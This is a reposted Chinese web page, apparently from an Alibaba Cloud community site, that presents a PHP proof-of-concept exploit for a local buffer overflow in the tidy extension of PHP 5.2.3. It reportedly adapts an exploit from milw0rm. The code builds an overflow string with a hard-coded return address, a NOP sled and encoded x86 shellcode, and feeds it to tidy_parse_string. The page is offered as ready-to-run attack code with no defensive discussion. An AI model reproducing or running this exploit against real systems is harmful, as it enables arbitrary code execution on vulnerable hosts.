PHP 5.2.3 tidy擴充本地溢出漏洞利用代碼

來源:互聯網
上載者:User

複製代碼 代碼如下:<?php

if (!extension_loaded("tidy")){die("you need Tidy extension loaded!");}

$scode =
"\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1".
"\x8c\xff\x26\xa9\x0b\x87\x39\xbd\x9f\x38\x22\xca\xff\xe6\x53\x27".
"\xb6\x6d\x67\x3c\x48\x9f\xb9\x82\xd2\xf3\x3e\xc2\x91\x0c\xfe\x09".
"\x54\x13\xc2\x65\x93\x28\x96\x5d\x58\x3b\xf3\x15\x3f\xe7\xfa\xc2".
"\xa6\x6c\xf0\x5f\xac\x2d\x15\x61\x59\x5a\x39\xea\x9c\xb7\xcb\xb0".
"\xba\x43\x0f\x79\x03\x2f\x04\x3a\xb3\x2a\xda\xc3\xbf\xbf\x9b\x3f".
"\x4b\xcf\x07\xed\xc0\x47\x30\x06\xdf\x1c\xc0\x68\xe0\x22\xc1\x03".
"\x89\x1e\x9e\x22\xbc\x3e\x76\xcc\xb8\x3d\xb6\xb5\x68\x29\xc7\xc0".
"\x8d\xf6\x4f\x4d\x73\x82\x9e\x3a\x73\x75\xfd\xa9\xef\x57\x67\x4a".
"\x95\x87\x48\xc9\x75\xa9\xf3\x79\x56\x40\x8f\xe4\xe4\x8a\x1d\x86".
"\x71\xa2\xd5\x2b\xa2\x40\x77\xd5\xca\x90\x14\x05\x24\x99\x9e\x01".
"\x1a\x3f\x39\xaa\x34\x5a\x31\x8a\xa4\xcb\xda\xab\x58\x74\x6f\x43".
"\xd4\x0a\xaf\xda\x72\x87\xc6\xb2\x13\x24\x6d\x39\x85\xbe\xe2\xcf".
"\x36\x1e\x8f\x4e\xc0\x36\x5b\xf2\x12\xe9\xe2\xb0\x16\xf5\xe4\x38".
"\x97\xf5\xe4\x38\x97";

$EIP="\xD8\x69\x83\x7C";
$NOP=str_repeat("\x90",12);
$____buff=str_repeat("a",2036).$EIP.$NOP.$scode;
tidy_parse_string(1,$____buff,1);
?>

看了MILW0RM上的EXP稍微改了下,中

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.